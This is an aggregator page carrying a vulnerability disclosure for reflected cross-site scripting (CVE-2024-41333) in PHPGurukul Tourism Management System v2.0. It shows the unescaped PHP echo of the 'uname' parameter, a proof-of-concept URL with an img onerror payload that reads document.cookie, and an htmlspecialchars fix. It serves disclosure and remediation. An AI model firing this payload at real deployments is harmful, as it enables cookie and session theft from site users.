Lucene search
K

Tourism Management System 2.0 Cross Site Scripting Vulnerability

🗓️ 07 Aug 2024 00:00:00Reported by Sampath Kumar KadajariType 
zdt
 zdt
🔗 0day.today👁 146 Views

A reflected cross-site scripting (XSS) vulnerability in Phpgurukul Tourism Management System v2.0 allows arbitrary code execution by injecting a crafted payload into the uname paramete

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-41333
6 Aug 202419:12
circl
CNNVD
PHPGurukul Tourism Management System 安全漏洞
4 Aug 202400:00
cnnvd
CVE
CVE-2024-41333
6 Aug 202400:00
cve
Cvelist
CVE-2024-41333
6 Aug 202400:00
cvelist
EUVD
EUVD-2024-39012
3 Oct 202520:07
euvd
NVD
CVE-2024-41333
6 Aug 202416:15
nvd
OSV
CVE-2024-41333
6 Aug 202416:15
osv
Packet Storm
Tourism Management System 2.0 Cross Site Scripting
2 Aug 202400:00
packetstorm
Positive Technologies
PT-2024-29361 · Unknown · Phpgurukul Tourism Management System
6 Aug 202400:00
ptsecurity
RedhatCVE
CVE-2024-41333
9 Jan 202609:34
redhatcve
Rows per page
# Exploit Title: Tourism Management System v2.0 - Cross Site Scripting (XSS)
# Exploit Author: Sampath kumar kadajari
# Vendor Homepage: https://phpgurukul.com/tourism-management-system-free-download/
# Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=7204 
# Version: v2.0
# CVE: CVE-2024-41333
# Tested on: Windows, XAMPP, Apache, MySQL

-------------------------------------------------------------------------------------------------------------------------------------------

A reflected cross-site scripting (XSS) vulnerability in Phpgurukul Tourism Management System v2.0 allows attackers to execute arbitrary code in the context of a user's browser via injecting a crafted payload into the uname parameter.



"Vulnerable Code" – (/admin/user-bookings.php)

<h2>Manage <?php echo $_GET['uname'];?>'s Bookings</h2>



---> Affected Component: http://localhost/tms/admin/[email protected]&&uname=%22%3E%3Cimg%20src/onerror=prompt(document.cookie)%3E 



"Fix for Vulnerable Code" 

<h2>Manage <?php echo htmlspecialchars($_GET['uname'], ENT_QUOTES, 'UTF-8'); ?>'s Bookings</h2>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation